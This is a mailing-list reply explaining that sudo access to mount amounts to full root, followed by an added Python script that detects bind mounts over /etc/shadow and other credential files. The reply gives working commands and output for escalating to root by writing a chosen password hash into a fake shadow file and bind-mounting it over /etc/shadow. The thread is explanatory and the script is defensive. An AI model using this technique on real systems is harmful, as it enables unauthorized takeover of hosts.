Hello,

On Mon, Jun 24, 2019 at 12:34:36PM +1200, Richard Hector wrote:
> On 23/06/19 12:07 PM, Andy Smith wrote:
> > andy@debtest1:~$ su - bob
> > Password:
> > bob@debtest1:~$ whoami
> > bob
> > bob@debtest1:~$ sudo -i
> > [sudo] password for bob:
> > Sorry, user bob is not allowed to execute '/bin/bash' as root on
> > debtest1.vps.bitfolk.com.
> > bob@debtest1:~$ echo
> > 'bob:$6$K6b1uzg.$pTNKJG/9hIgnhBL53Y2mr0rrsBBZE1xDWE0bO8E94dBlM.itel4/meJTZYL12IIOZ9ck/
> > 3P2/j5XGbyKcKxFK/:18070:0:99999:7:::' > myshadow
> > bob@debtest1:~$ sudo mount --bind ./myshadow /etc/shadow
> > bob@debtest1:~$ su -
> > Password:
> > root@debtest1:~# whoami
> > root
[…]

> Haven't you just set your own (bob) password there? Not saying you
> couldn't set root's instead, but ... it looks like in this case you
> already knew it.

Yes, it was a mispaste from an earlier line in my screen history.
Sorry about that.

Point is you can take a hash that you already know, e.g. your own,
write it into a new shadow file but make it be for the root user, not
your own user, e.g.:

bob@debtest1:~$ echo 'root:$6$K6b1uzg.$pTNKJG/9hIgnhBL53Y2mr0rrsBBZE1xDWE0bO8E94dBlM.itel4/meJTZYL12IIOZ9ck/3P2/j5XGbyKcKxFK/:18070:0:99999:7:::' > myshadow

and then since you are able to use mount as root you can bind mount
your new shadow file over the system's real shadow file, hence
effectively resetting root's password:

bob@debtest1:~$ sudo mount --bind ./myshadow /etc/shadow
bob@debtest1:~$ su -
Password:
root@debtest1:~# whoami
root

Since you can bind mount files and directories, root access to "mount"
means root access to every part of the existing filesystem, so there
are many, many ways of getting a root shell from that.

Try it. :) But maybe on a test host, as bind-mounting over something
important may completely break your system.

Cheers,
Andy
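A detection-side counterpart to the technique in Andy's message, added here as an example and not part of the thread: it parses lines in /proc/self/mountinfo format (the sample lines and the /home/bob/myshadow path below are constructed for the example) and flags any mount whose target is a credential or privilege file such as /etc/shadow, which is what a bind mount over it looks like from the kernel's point of view.

```python
"""Flag mounts whose mount point is a sensitive file or directory.

Input is /proc/self/mountinfo text (see proc(5)). On a live host,
pass open("/proc/self/mountinfo").read() to find_overlays().
"""
import re

# Paths that should never be a mount point on an ordinary system.
SENSITIVE_FILES = {"/etc/shadow", "/etc/passwd", "/etc/sudoers", "/etc/group"}
SENSITIVE_DIRS = ("/etc/sudoers.d", "/etc/pam.d")

_OCTAL = re.compile(r"\\([0-7]{3})")


def _unescape(field):
    """Decode mountinfo octal escapes such as \\040 (a space in a path)."""
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), field)


def parse_mountinfo(text):
    """Yield one dict per mountinfo line: root, target, fstype, source."""
    for line in text.splitlines():
        if not line.strip():
            continue
        # Optional fields precede the " - " separator; fstype/source follow it.
        left, _, right = line.partition(" - ")
        lf, rf = left.split(), right.split()
        yield {"root": _unescape(lf[3]), "target": _unescape(lf[4]),
               "fstype": rf[0], "source": _unescape(rf[1]) if len(rf) > 1 else ""}


def find_overlays(text):
    """Return (target, root, source) for every mount covering a sensitive path."""
    hits = []
    for m in parse_mountinfo(text):
        t = m["target"]
        in_dir = any(t == d or t.startswith(d + "/") for d in SENSITIVE_DIRS)
        if t in SENSITIVE_FILES or in_dir:
            hits.append((t, m["root"], m["source"]))
    return hits


# Constructed sample: a root fs, /proc, and a bind mount of a user's file
# over /etc/shadow (the "root" field shows where the data really lives).
SAMPLE = """\
25 0 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro
38 25 0:22 / /proc rw,nosuid,nodev,noexec,relatime shared:14 - proc proc rw
120 25 8:1 /home/bob/myshadow /etc/shadow rw,relatime shared:1 - ext4 /dev/sda1 rw
"""

if __name__ == "__main__":
    for target, root, source in find_overlays(SAMPLE):
        print(f"WARNING: {target} is a mount point (root={root} on {source})")
```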